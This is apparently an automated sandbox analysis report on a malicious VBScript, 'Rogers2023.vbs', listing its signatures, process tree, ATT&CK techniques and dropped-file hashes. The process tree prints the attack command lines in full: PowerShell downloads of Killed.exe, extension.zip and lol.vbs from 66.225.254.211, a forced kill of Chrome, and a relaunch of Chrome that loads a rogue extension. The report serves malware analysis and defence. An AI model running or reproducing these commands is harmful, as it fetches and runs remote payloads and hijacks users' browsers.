531608d352c2959e768c8dbdb56e7a712986a51d946c9ab90733429ed12534d2

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
28/01/2024, 12:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rogers2023.vbs
Size

1KB
MD5

7c86b22fd57b3992e3750c3e66dfe9eb
SHA1

306b70d36f32ff0d03e51159503c50f31e584cd9
SHA256

531608d352c2959e768c8dbdb56e7a712986a51d946c9ab90733429ed12534d2
SHA512

4b86347aff80553988748e3e4bc457eafd552f27cc438623eddfcf387290f4b43d3aeb55e4e03e82472cff195946f573a7edca367a35441f640caa2ef9a1631f

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
7	348	powershell.exe
8	3836	powershell.exe
9	848	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4844	Killed.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3124	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
812	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133509195427679731"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
4836	powershell.exe
4836	powershell.exe
2016	powershell.exe
2016	powershell.exe
348	powershell.exe
848	powershell.exe
3836	powershell.exe
348	powershell.exe
848	powershell.exe
3836	powershell.exe
2680	chrome.exe
2680	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	2016	powershell.exe
Token: SeDebugPrivilege	348	powershell.exe
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	3836	powershell.exe
Token: SeDebugPrivilege	812	taskkill.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe
Token: SeShutdownPrivilege	4416	chrome.exe
Token: SeCreatePagefilePrivilege	4416	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe
4416	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1476 wrote to memory of 3056	1476	WScript.exe	85
PID 1476 wrote to memory of 3056	1476	WScript.exe	85
PID 3056 wrote to memory of 4836	3056	cmd.exe	86
PID 3056 wrote to memory of 4836	3056	cmd.exe	86
PID 3056 wrote to memory of 2040	3056	cmd.exe	90
PID 3056 wrote to memory of 2040	3056	cmd.exe	90
PID 2040 wrote to memory of 348	2040	cmd.exe	89
PID 2040 wrote to memory of 348	2040	cmd.exe	89
PID 3056 wrote to memory of 548	3056	cmd.exe	87
PID 3056 wrote to memory of 548	3056	cmd.exe	87
PID 548 wrote to memory of 848	548	cmd.exe	91
PID 548 wrote to memory of 848	548	cmd.exe	91
PID 3056 wrote to memory of 1932	3056	cmd.exe	96
PID 3056 wrote to memory of 1932	3056	cmd.exe	96
PID 1932 wrote to memory of 3836	1932	cmd.exe	94
PID 1932 wrote to memory of 3836	1932	cmd.exe	94
PID 3056 wrote to memory of 2016	3056	cmd.exe	93
PID 3056 wrote to memory of 2016	3056	cmd.exe	93
PID 3056 wrote to memory of 3124	3056	cmd.exe	97
PID 3056 wrote to memory of 3124	3056	cmd.exe	97
PID 3056 wrote to memory of 4448	3056	cmd.exe	109
PID 3056 wrote to memory of 4448	3056	cmd.exe	109
PID 4448 wrote to memory of 4844	4448	WScript.exe	108
PID 4448 wrote to memory of 4844	4448	WScript.exe	108
PID 4844 wrote to memory of 4940	4844	Killed.exe	107
PID 4844 wrote to memory of 4940	4844	Killed.exe	107
PID 4940 wrote to memory of 812	4940	cmd.exe	106
PID 4940 wrote to memory of 812	4940	cmd.exe	106
PID 4844 wrote to memory of 4980	4844	Killed.exe	103
PID 4844 wrote to memory of 4980	4844	Killed.exe	103
PID 4980 wrote to memory of 4416	4980	cmd.exe	105
PID 4980 wrote to memory of 4416	4980	cmd.exe	105
PID 4416 wrote to memory of 3568	4416	chrome.exe	104
PID 4416 wrote to memory of 3568	4416	chrome.exe	104
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112
PID 4416 wrote to memory of 3800	4416	chrome.exe	112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rogers2023.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temparchivo.bat" "
  2⤵
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -command ""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4836
- - C:\Windows\system32\cmd.exe
    cmd /c start /min "" powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/Killed.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Killed.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:548
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/Killed.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Killed.exe'"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:848
- - C:\Windows\system32\cmd.exe
    cmd /c start /min "" powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/extension.zip' -OutFile 'C:\Users\Admin\AppData\Local\Temp\extension.zip'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Expand-Archive extension.zip -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\lol'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\system32\cmd.exe
    cmd /c start /min "" powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/lol.vbs' -OutFile 'C:\Users\Admin\AppData\Local\Temp\lol.vbs'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1932
- - C:\Windows\system32\timeout.exe
    timeout 5
    3⤵
    - Delays execution with timeout.exe
    PID:3124
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lol.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/extension.zip' -OutFile 'C:\Users\Admin\AppData\Local\Temp\extension.zip'"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/lol.vbs' -OutFile 'C:\Users\Admin\AppData\Local\Temp\lol.vbs'"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome.exe --system-developer-mode --load-extension=%USERPROFILE%\AppData\Local\Temp\lol\extension
1⤵
- Suspicious use of WriteProcessMemory
PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  chrome.exe --system-developer-mode --load-extension=C:\Users\Admin\AppData\Local\Temp\lol\extension
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4416
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:1068
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:2436
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:2
    3⤵
    PID:3800
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3316 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:1
    3⤵
    PID:3424
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3304 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:1
    3⤵
    PID:3108
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4664 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:1
    3⤵
    PID:412
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4832 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:4576
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4848 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:2324
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:1428
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5256 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:3880
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5156 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:8
    3⤵
    PID:8
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2960 --field-trial-handle=1292,i,14677842678865082525,9497861967487823717,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa98489758,0x7ffa98489768,0x7ffa98489778
1⤵
PID:3568

C:\Windows\system32\taskkill.exe
TASKKILL /IM chrome.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:812

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c TASKKILL /IM chrome.exe /F
1⤵
- Suspicious use of WriteProcessMemory
PID:4940

C:\Users\Admin\AppData\Local\Temp\Killed.exe
"C:\Users\Admin\AppData\Local\Temp\Killed.exe"
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4844

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
77fc3a7ab83169fa874b064623766afa

SHA1
28e5e31c64824994c5b373c19cc9bb4fc1cdebf1

SHA256
65827b4354e748d843fdc03372211210565afc56f9358aa8b6f395fb529fd6df

SHA512
ef827bd731bfdbc293bad532be4e0720a747b5c06136f9b40694e1b6b050c68c42a7164a7298d0e2b02fef9f474944a30c4df57158000ade61030502053627db

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
369B

MD5
e17aeb979618feecbab1ab15d26665e5

SHA1
d4190d91cecf1a1362d2e4ef8199d1a45df658fb

SHA256
648a639005873f481bc68fd6f99c00632feaf40d6c0b901ad6dd1bc53d2ad124

SHA512
a821f284c5d53b76cb3b1cac76a328c9d0d2fc18c0da11979cbfaf4af8c715422ec0469a17cdc86720252b9a694d58451daf5d255e5f870755ce5818715e39d6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
ce679250627c25b1e6885e4ec8712dc8

SHA1
b6d6c44996881e5a50dd4e35a57fc493d882546e

SHA256
539d3fe0b9e975abb34a8e828edb3de40735efc094b422e7342a9e1e63b5fc42

SHA512
daf02e024a48975b5d20a5a649859ae1e240f09451e09eafe339d23acbfd2ee575adcf4d46c197937759a2737728e250382692b13d2344f586b842dc9f477bb1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
9d602e4981695ad34d8dd57bd5d4b99c

SHA1
664cf73a225e22d0ce6c4feb80a117b65835fcfd

SHA256
8cf58dae8a735395949311bd1799b8f7c02d8a5797e67fda2ec3bc824f5f7748

SHA512
dccada24995d17ea481531a59d9b70cb1fa71252e88e1cfe4c87f08250c92c60da3690e652928a24346e65a5a25b357c0ad8430d38c7ecc47dd853d62890d911

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
be000dd6c2af00733f713211e895ab23

SHA1
74b0cfa1842b7c7f696f94ef15290015c74918bb

SHA256
a46d0f31f5a51ca196630f9d7ac4d6ddd463bde357c8a130d7b275c9f0f307ba

SHA512
edaf9ed326c360162ed7a50c0eabcfcf1d104d0f03d28afa152189fb95e83c5fe799d58b6b4f6267d866ac5acc2acfd64af2b50678386dd6028272182c5864bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
231KB

MD5
33f7d3a98da4df27432bc6531ffcb30f

SHA1
ab4f5b42f01cd0ec7a0e792610f3d586d1bc73cc

SHA256
b6b79c6638a93f7479fd1690ccf46dd8b5db819edab328e60e96eb2ac9428431

SHA512
a30d52200f791df8212bcf5655d46375605e99a431749c7b2445a58f28a1d56fff5e508cabc87ea40f855b7ca0078ed59a7cc3f223cb5ab0d419e21bd4ed6040

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Temp\Killed.exe

Filesize
11KB

MD5
c471faa378e1b545a4ebdd4d236ffebe

SHA1
1215cf4bf36d4fa0e3c3b0a3bbc9feb26067defd

SHA256
b8fa36f1a50a311cbbcd8e25c0b1a8f350681385d8f6c57c323dae0d4392fb38

SHA512
c2e9d841b8b77a9d0600dcef55b26cc2435cab446f1ed6e768d5e4fdaba045414ab2682452081a39eab8293d0e8f34487da13fa051eb2dabaa4bfa4bc5d4db8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wsypyukw.4pt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\lol.vbs

Filesize
78B

MD5
2eb0c444c598dbc099edfb928089ef73

SHA1
ca1c3acfb2f08f91a7a628e0e0d2ccfa8aafbbde

SHA256
fb9bf0867d426c413f7c99ef0368cd0eed730fea188e82f8ff31b51167c7e2f6

SHA512
b24856c521c5e6500bb43a72b97497e890b2b83660d04a3b8221a348644dc929ce6ce9d7e1a07692d1133be09a43f25ff09da680d7b7b397e82fa27068cded87

Download Submit
C:\Users\Admin\AppData\Local\Temparchivo.bat

Filesize
742B

MD5
884a4151bebdb66d4bb46d61bdc5573f

SHA1
641322b21c9ec4726d3fce44b07a4e520b92182d

SHA256
2bdffc8de65d8e35469bdc6fd32554b7941e46430f7ff63ec5497e8f5eac2725

SHA512
ec75247563e24030ff8f3811b33067bd47efa09ed56f41d4ff3871566ae9afbf2bccdc88f90d825db64911aa19dd33cf509dc43f127b08e252bd5eddae00191e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
6bfbee7a2fd4f8477cbf482184a0bb2a

SHA1
e76696a2b46b4824e0740237870d7e1074cf3ffc

SHA256
7d4c09cd52ca0d40fccabdea874f488e11c302cd564ef7e17bfb0e79f5707863

SHA512
4066e66e9f43b5333b46bec7c7285c12b6b4d470e30f5eaadd90ba1258da2a1e65f17616ff48f5984840c16d972ebbdfb1418365aaf6e17877910b3fef63e98c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

